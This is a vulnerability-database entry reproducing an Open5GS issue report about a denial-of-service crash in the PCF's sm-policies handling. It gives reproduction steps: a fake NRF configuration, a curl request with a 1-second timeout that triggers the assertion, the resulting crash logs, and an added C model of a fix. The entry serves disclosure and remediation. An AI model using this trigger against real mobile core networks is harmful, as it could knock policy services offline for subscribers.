| Title | Open5gs PCF v2.7.7 Denial of Service |
|---|---|
| Source | https://github.com/open5gs/open5gs/issues/4438 |
| User | LinZiyu (UID 94035) |
| Submission | 2026-04-20 20:37 (1 month ago) |
| Moderation | 2026-05-09 09:35 (19 days later) |
| Status | Accepted |
| VulDB Entry | 362440 [Open5GS up to 2.7.7 sm-policies Endpoint pcf_sess_sbi_discover_and_send denial of service] |
| Points | 20 |

Description:

### Open5GS Release, Revision, or Tag
v2.7.7
### Steps to reproduce
PCF crashes if an `SM Policy Association` request triggers `NBSF_MANAGEMENT`
discovery and the original client disconnects before the delayed NRF discovery
response arrives.
The `SM Policy Association` creation path for a VPLMN SUPI calls:
```c
pcf_sess_sbi_discover_and_send(
    OGS_SBI_SERVICE_TYPE_NBSF_MANAGEMENT, ...);
```
When the delayed `NNRF_DISC` response is later processed, the PCF discovery
handler checks whether a BSF instance was found. If not, it tries to recover by
sending a fallback response on the original associated stream:
```c
stream = ogs_sbi_stream_find_by_id(xact->assoc_stream_id);
ogs_assert(stream);
```
If the original requester already timed out and closed the HTTP/2 stream,
`ogs_sbi_stream_find_by_id()` returns `NULL`, and the assertion kills PCF.
### Steps to reproduce
This live reproduction used a temporary fake NRF endpoint returning a delayed
empty `SearchResult`, plus a temporary `pcf.yaml` pointing `client.nrf` to that
fake NRF. After validation, the config was restored.
1. Point `/home/ubuntu/docker-open5gs/configs/basic/pcf.yaml` to a fake NRF:
```yaml
pcf:
  serving:
    - plmn_id:
        mcc: 001
        mnc: 01
  sbi:
    client:
      nrf:
        - uri: http://10.33.33.1:18081
```
2. Restart `pcf`.
3. Run a fake HTTP/2 cleartext NRF that:
   - returns `204` to registration-related paths
   - returns `201` to subscription creation
   - returns `200 {"nfInstances":[]}` to `/nnrf-disc/v1/nf-instances` after a
     3 second delay
4. Send a VPLMN `SM Policy Association` request with a 1-second timeout:
```bash
curl --http2-prior-knowledge --max-time 1 -sS -i \
  -X POST http://10.33.33.7/npcf-smpolicycontrol/v1/sm-policies \
  -H 'content-type: application/json' \
  --data '{"supi":"imsi-999700000000001","pduSessionId":9,"pduSessionType":"IPV4","dnn":"internet","notificationUri":"http://127.0.0.1:9999/cb","ipv4Address":"10.0.0.9","sliceInfo":{"sst":1,"sd":"000001"}}'
```
5. Wait for the delayed discovery response to arrive, then inspect PCF logs and
container state.
### Logs
Original requester:
```shell
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
```
PCF logs:
```shell
04/10 18:47:24.412: [sbi] WARNING: Try to discover [nbsf-management] (../lib/sbi/path.c:563)
04/10 18:47:25.413: [sbi] INFO: RST_STREAM received: stream_id=1 (../lib/sbi/nghttp2-server.c:1288)
04/10 18:47:27.419: [pcf] ERROR: [Unknown:imsi-999700000000001:9] (NF discover) No [nbsf-management:PCF] (../src/pcf/nnrf-handler.c:82)
04/10 18:47:27.419: [pcf] FATAL: pcf_nnrf_handle_nf_discover: Assertion `stream' failed. (../src/pcf/nnrf-handler.c:96)
```
After the crash, the PCF container restarted automatically.
### Expected behaviour
If the requester disconnects before delayed BSF discovery completes, PCF should discard the late result or fail the transaction without dereferencing a dead stream.
### Observed Behaviour
The original client times out, the HTTP/2 stream is removed, and the delayed discovery response causes PCF to assert on a `NULL` stream pointer and crash.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required.
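The race described in the report, as an added C model that is not Open5GS code: `stream_open`, `stream_close`, `stream_find_by_id` and `xact_t` are hypothetical stand-ins for the SBI stream table and transaction, and `handle_nf_discover` shows the expected behaviour (discard the late result when the requester's stream is already gone) in place of the assertion.

```c
/* Added example, not Open5GS code: minimal model of the late-discovery race.
 * stream_t / xact_t / stream_find_by_id() are hypothetical stand-ins. */
#include <stdio.h>
#include <stdbool.h>
#include <stddef.h>

#define MAX_STREAMS 8

typedef struct { int id; bool open; } stream_t;      /* one HTTP/2 stream  */
typedef struct { int assoc_stream_id; } xact_t;       /* pending discovery  */

static stream_t streams[MAX_STREAMS];

/* Register the HTTP/2 stream of an incoming SM Policy Association request. */
static stream_t *stream_open(int id) {
    for (int i = 0; i < MAX_STREAMS; i++)
        if (!streams[i].open) { streams[i].id = id; streams[i].open = true; return &streams[i]; }
    return NULL;
}

/* The client timed out (RST_STREAM): the stream leaves the table. */
static void stream_close(int id) {
    for (int i = 0; i < MAX_STREAMS; i++)
        if (streams[i].open && streams[i].id == id) streams[i].open = false;
}

/* Lookup by id; NULL once the requester has gone away. */
static stream_t *stream_find_by_id(int id) {
    for (int i = 0; i < MAX_STREAMS; i++)
        if (streams[i].open && streams[i].id == id) return &streams[i];
    return NULL;
}

typedef enum { DISC_SENT_FALLBACK = 0, DISC_DISCARDED_LATE = 1 } disc_result_t;

/* Hardened handling of a delayed, empty NNRF_DISC result: a missing stream
 * means the requester is gone, so the late result is dropped, not asserted. */
static disc_result_t handle_nf_discover(const xact_t *xact) {
    stream_t *stream = stream_find_by_id(xact->assoc_stream_id);
    if (stream == NULL) {
        fprintf(stderr, "late NF discover result for closed stream %d: discarded\n",
                xact->assoc_stream_id);
        return DISC_DISCARDED_LATE;
    }
    return DISC_SENT_FALLBACK;   /* stream still open: send fallback response */
}

/* Replay the reported timeline: request, RST_STREAM at 1 s, result at 3 s. */
static disc_result_t replay_reported_race(void) {
    xact_t xact = { .assoc_stream_id = 1 };
    stream_open(1); stream_close(1);
    return handle_nf_discover(&xact);
}

/* Same flow when the client waits long enough: the stream is still there. */
static disc_result_t replay_without_disconnect(void) {
    xact_t xact = { .assoc_stream_id = 2 };
    stream_open(2);
    return handle_nf_discover(&xact);
}
```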